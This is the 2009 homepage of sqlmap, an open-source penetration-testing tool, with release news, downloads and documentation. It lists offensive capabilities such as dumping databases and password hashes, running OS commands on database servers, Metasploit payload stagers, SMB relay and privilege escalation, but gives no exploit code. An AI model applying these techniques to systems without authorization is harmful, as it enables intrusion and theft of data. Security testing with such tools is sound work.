sqlmap: automatic SQL injection tool

News

May 8, 2009: sqlmap version 0.6.4 Debian package has been officially accepted in Debian repository! Read details on my blog post.
April 22, 2009: sqlmap 0.7 release candidate 1 is out with all of the new features described during my presentation at Black Hat Europe 2009. The presentation whitepaper and slides are also available.
April 3, 2009: sqlmap 0.7 will be released at Black Hat Europe 2009 during my presentation titled Advanced SQL Injection exploitation to operating system full control.
March 11, 2009: my presentation titled SQL injection: Not only AND 1=1 is online on SlideShare site.
February 3, 2009: sqlmap 0.6.4 is out with many new enhancements and a few major bugs fixed.
January 9, 2009: my presentation titled SQL injection exploitation internals is online on SlideShare site.
December 18, 2008: sqlmap 0.6.3 is out with many new enhancements and some major bugs fixed.
November 21, 2008: posted three positions for contributing to sqlmap development on SourceForge Project Help page. If you'd like to contribute, check them out and get back by e-mail.
November 9, 2008: sqlmap Subversion repository is now online on https://svn.sqlmap.org/sqlmap/trunk/sqlmap/. You can checkout it if you want to give a try to the development version.
November 4, 2008: sqlmap 0.6.2 is out with some major bugs fixed and a few minor enhancements.
October 24, 2008: sqlmap auxiliary module commited on the official Metasploit Framework 3 Subversion repository. Thanks Efrain Torres!
October 20, 2008: sqlmap 0.6.1 is out with the integration with Metasploit, a few new features and some bugs fixed.
September 1, 2008: sqlmap 0.6 is out with many new features, complete code refactoring and many bugs fixed.

Introduction

sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.

Features

Some of the major features implemented in sqlmap include:

Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server back-end database management systems. Besides these four database management systems software. sqlmap can also identify Microsoft Access, DB2, Informix, Sybase and Interbase.
Full support for three SQL injection techniques: inferential blind SQL injection, UNION query (inband) SQL injection and batched queries support. sqlmap can also test for time based blind SQL injection.
Extensive back-end database management system software and underlying operating system fingerprint based upon inband error messages, banner parsing, functions output comparison and specific features such as MySQL comment injection. It is also possible to force the back-end database management system name if you already know it. sqlmap is also able to fingerprint the web server operating system, the web application technology and, in some circumstances, the back-end DBMS operating system.
Support to retrieve on all four back-end database management system banner, current user, current database, check if the current user is a database administrator, enumerate users, users password hashes, users privileges, databases, tables, columns, dump tables entries, dump whole database management system and run user's own SQL statement.
Support to read either text or binary files from the database server underlying file system when the database software is MySQL, PostgreSQL and Microsoft SQL Server.
Support to execute arbitrary commands on the database server underlying operating system when the database software is MySQL, PostgreSQL via user-defined function injection and Microsoft SQL Server via xp_cmdshell() stored procedure.
Support to establish an out-of-band stateful connection between the attacker box and the database server underlying operating system via:
- Stand-alone payload stager created by Metasploit and supporting Meterpreter, shell and VNC payloads for both Windows and Linux;
- Microsoft SQL Server 2000 and 2005 sp_replwritetovarbin stored procedure heap-based buffer overflow (MS09-004) exploitation with multi-stage Metasploit payload support;
- SMB reflection attack with UNC path request from the database server to the attacker box by using the Metasploit smb_relay exploit on the attacker box.
Support for database process' user privilege escalation via Windows Access Tokens kidnapping on MySQL and Microsoft SQL Server via either Meterpreter's incognito extension or Churrasco stand-alone executable.

Download

sqlmap 0.7 release candidate 1 version can be downloaded as a source gzip compressed file or as a source zip compressed file.
WARNING: This release is a candidate, it only works on Linux so please do not complain that it does not work on your Windows or Mac OS X systems.

sqlmap can be downloaded from its SourceForge File List page. It is available in various formats:

Source gzip compressed operating system independent.
Source bzip2 compressed operating system independent.
Source zip compressed operating system independent.
DEB binary package architecture independent for Debian and any other Debian derivated GNU/Linux distribution.
RPM binary package architecture independent for Fedora and any other operating system that can install RPM packages.
Portable executable for Windows that does not require the Python interpreter to be installed on the operating system.

You can also checkout the source code from the sqlmap Subversion repository to give a try to the development release:


$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap/

Documentation

sqlmap user's manual (HTML and PDF)
sqlmap developer's documentation
sqlmap ChangeLog
SQL injection exploitation internals slides presented at a private Conference in London (UK) on January 9, 2009
SQL injection: Not only AND 1=1 slides presented at Front Range OWASP Conference in Denver (USA) on March 5, 2009
Advanced SQL injection to operating system full control whitepaper and slides presented at Black Hat Europe 2009 in Amsterdam (The Netherlands) on April 16, 2009

Mailing lists

sqlmap has two mailing lists hosted on SourceForge:

The sqlmap-users mailing list is the preferred way to ask questions, report bugs, suggest new features and discuss with other users. The mailing list is archived online. To subscribe use the online web form.

The sqlmap-devel mailing list is for advanced users and developers who want to contribute to the sqlmap development and anyone with questions or suggestions concerning the code base. The mailing list is archived online. To subscribe use the online web form.

License

sqlmap is released under the terms of the General Public License v2. sqlmap is copyrighted by Bernardo Damele A. G. and Daniele Bellucci.

Author

Bernardo Damele A. G. (inquis) - Lead developer
PGP Key ID: 0x05F5A30F

Contribute

If you want to contribute to sqlmap development reporting a bug, providing a patch, commenting on the code base or simply need to find help to run sqlmap first refer to the sqlmap documentation, then surf the sqlmap mailing lists online archives and if you still have something to say, do that on the appropriate sqlmap mailing list. If nobody gets back to you, then drop me an e-mail.

Sponsorship

Part of the sqlmap development was sponsored by the Open Web Application Security Project during the OWASP Spring of Code 2007 contest: